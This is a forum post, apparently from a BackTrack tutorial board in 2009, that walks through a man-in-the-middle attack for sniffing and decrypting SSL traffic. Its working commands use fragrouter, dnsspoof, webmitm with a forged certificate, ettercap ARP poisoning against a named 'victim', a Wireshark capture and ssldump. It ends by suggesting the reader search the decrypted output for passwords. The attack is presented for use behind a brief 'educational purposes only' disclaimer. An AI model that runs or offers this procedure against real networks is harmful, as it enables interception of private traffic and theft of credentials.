HomeCalendarGalleryFAQSearchMemberlistUsergroupsRegisterLog in
New Topics are on the way...
<body> </body>

Share | 
 

 Sniffing SSL traffic using MITM attack / ettercap, fragrouter, webmitm and dnsspoof.

View previous topic View next topic Go down 
AuthorMessage
Admin
Admin
avatar

Posts : 63
Join date : 2009-05-10
Age : 25

PostSubject: Sniffing SSL traffic using MITM attack / ettercap, fragrouter, webmitm and dnsspoof.   Sun Oct 18, 2009 11:07 pm

This is my method of sniffing and decrypting ssl traffic on a network.
Before reading on this guide is for educational purposes only. I take no responsibility from what people do with this info.
First thing is to get fragrouter. I don't know if you can use other tools provided with the backtrack, there are 100 ways to skin a cat and this is just my way.

http://packetstormsecurity.nl/UNIX/IDS/nidsbench/fragrouter.html

There are lots of things that you can do with fragrouter but we are going to use fragrouter to setup IP forwarding.

We do this with this command :
code:
Code:
fragrouter -B1

Squash that window and put it to one side. Now open another shell and we will start dnsspoof with this command

Code:
Code:
dnsspoof -i ath0 (or whatever network interface you are using)

Again put that window to one side and lets load up webmitm. Webmitm will issue our ssl cert to the victim so we can decrypt the traffic we capture.

Start webmitm by typing

Code:
Code:
 webmitm -d

Now we can start the arp spoof. To start ettercap type
Code:
ettercap -T -M arp:remote /router addy/ /victim addy/

Ok now we are rolling next thing is to sniff the traffic. There are a few things you can do know like using ettercap filters and adding urls from metasploit, (Maybe next tut ) and lots of other things. But we are intrested in the ssl traffic so I use wireshark to save the data into a .cap file.

You can find wireshark in Backtrack >>> Privilege Escalation >>> Sniffers.

Now we have loaded wireshark lets start capturing packets. Go to Capture >>> Options and setup what network card you are using and then hit start.

Ok you should now be capturing packets addressed to your victims addy. Once you have captured enough, stop wireshark and save the data to your root directory.

Now to decrypt the SSL data.

You should first download ssldump:
http://www.rtfm.com/ssldump/

ssldump is going to decrypt our sniffed ssl data using our fake ssl cert we issued to the victim. We do this by opening up a shell and typing:
Code:

ssldump -r your.cap -w webmitm.crt  -d > out
And you are done, all the ssl data will be saved to a file called out in your root dir. Use what you like to search it for passwords etc.

There we go! nice and simple for everybody to understand.
Back to top Go down
View user profile http://securedubai.hypeforum.net
KiNGGG



Posts : 6
Join date : 2009-12-26

PostSubject: Re: Sniffing SSL traffic using MITM attack / ettercap, fragrouter, webmitm and dnsspoof.   Sat Dec 26, 2009 1:49 pm

Cool Jaw Dropping Info Very Happy
Back to top Go down
View user profile
 
Sniffing SSL traffic using MITM attack / ettercap, fragrouter, webmitm and dnsspoof.
View previous topic View next topic Back to top 
Page 1 of 1
 Similar topics
-
» Review on set 8019 Republic attack shuttle
» Blue Eyes White Dragon Attack !
» 20.12.2012 biz traffic
» Icarus Attack VS Dark Illusion
» What is Sea Attack ?

Permissions in this forum:You cannot reply to topics in this forum
*.*ShAmOn*.* :: Bactrack Tutorials Here-
Jump to: